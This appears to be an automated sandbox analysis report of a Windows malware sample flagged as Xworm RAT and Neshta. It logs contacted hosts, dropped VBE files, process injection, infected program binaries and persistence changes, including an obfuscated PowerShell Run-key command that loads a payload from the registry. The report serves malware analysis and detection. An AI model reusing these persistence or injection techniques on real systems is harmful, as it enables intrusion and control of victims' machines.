US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp

Files

memory/2032-0-0x000007FEF5A13000-0x000007FEF5A14000-memory.dmp

memory/2032-1-0x0000000000220000-0x0000000000230000-memory.dmp

memory/2032-2-0x000007FEF5A13000-0x000007FEF5A14000-memory.dmp

memory/2032-7-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dwhdnu.vbe

MD5	f1d487d507b6b841db8b7b72bd9ee442
SHA1	8be4ecbd352ea9717b73cda28108a5a72f1e28b7
SHA256	0026871fae17c91b3441af1af102d8867ddd3ca3f0ddf5cbb53be6ddf53de290
SHA512	91b8a1399b92c4258cfa6ce27a68723a19352012c5532cdb3273305f7fa3b3a238359c1a6264472f5cae437edc7afc7745d22e1ade09e04d7ebf5847c553331e

C:\Users\Admin\AppData\Local\Temp\exwlrs.vbe

MD5	dbe5866bb55d72813066600716474395
SHA1	671ddef8c1f04b8981e808f8c64233c89c8ed7fd
SHA256	46c622b14a31028da2b382e2676f47992f5384693aa3638165dcb02454fb5ef7
SHA512	b40c2fd0d7fec197b41801624d4e6de7b376838fcd792abc82ea8c385d7443be73728e92cbba55dbfca2baafdf13b6b585f7c498e0b2af782dd8fdc377574abf

memory/2032-14-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

memory/2068-19-0x000000001B630000-0x000000001B912000-memory.dmp

memory/2068-20-0x0000000002B20000-0x0000000002B28000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JU6D4991FXZPJPVKOJ98.temp

MD5	977e4474b2fb78ec638839b60cead8b9
SHA1	0ee4bf76bf4e2bb255707d86b6dd86f5540b412e
SHA256	c7a548fa0db3117311db44cbb57d27a5a13d9531c2889489b840768d162a56d8
SHA512	e1d9241ece1fd18831197228e8516595a7206a97105f914d5719c5fe28dba3bcf79c3f4519d04b7af735b188c39fb8c9840cccc4c5e512b66e72d20e2d98eab3

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 02:03

Reported

2024-05-22 02:06

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe"

Signatures

Detect Xworm Payload

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Neshta

persistence spyware neshta

Xworm

trojan rat xworm

Detects Windows executables referencing non-Windows User-Agents

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Blocklisted process makes network request

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Checks computer location settings

Description	Indicator	Process	Target
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	C:\Windows\System32\WScript.exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	C:\Windows\System32\WScript.exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	C:\Windows\SysWOW64\WScript.exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	C:\Windows\SysWOW64\WScript.exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	C:\Windows\SysWOW64\WScript.exe	N/A

Drops startup file

Description	Indicator	Process	Target
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.lnk	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.lnk	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A

Modifies system executable filetype association

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	C:\Program Files (x86)\windows mail\wab.exe	N/A

Adds Run key to start application

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%ambuscades% -w 1 $Quantized202=(Get-ItemProperty -Path 'HKCU:\\Nordmanden\\').Guldstole;%ambuscades% ($Quantized202)"	C:\Windows\SysWOW64\reg.exe	N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description	Indicator	Process	Target
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A

Suspicious use of SetThreadContext

Description	Indicator	Process	Target
PID 4852 set thread context of 1880	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 3196 set thread context of 3520	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 4364 set thread context of 3240	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 1360 set thread context of 2000	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~2.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MIA062~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~4.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~3.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MI391D~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13187~1.37\MICROS~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	C:\Program Files (x86)\windows mail\wab.exe	N/A

Drops file in Windows directory

Description	Indicator	Process	Target
File opened for modification	C:\Windows\svchost.com	C:\Program Files (x86)\windows mail\wab.exe	N/A

Enumerates physical storage devices

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings	C:\Program Files (x86)\windows mail\wab.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	C:\Program Files (x86)\windows mail\wab.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A

Modifies registry key

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\reg.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious behavior: MapViewOfSection

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
N/A	N/A	C:\Program Files (x86)\windows mail\wab.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4952 wrote to memory of 2828	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 4952 wrote to memory of 2828	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 2828 wrote to memory of 1420	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 1420	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2468	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 1420 wrote to memory of 2468	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 4568	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 4952 wrote to memory of 4568	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 4568 wrote to memory of 1208	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4568 wrote to memory of 1208	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1208 wrote to memory of 3708	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 3708	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 1420 wrote to memory of 4852	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4852	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4852	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4852 wrote to memory of 4592	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4592	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4592	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 3196	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1208 wrote to memory of 3196	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1208 wrote to memory of 3196	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3196 wrote to memory of 4340	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 3196 wrote to memory of 4340	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 3196 wrote to memory of 4340	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 1880	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
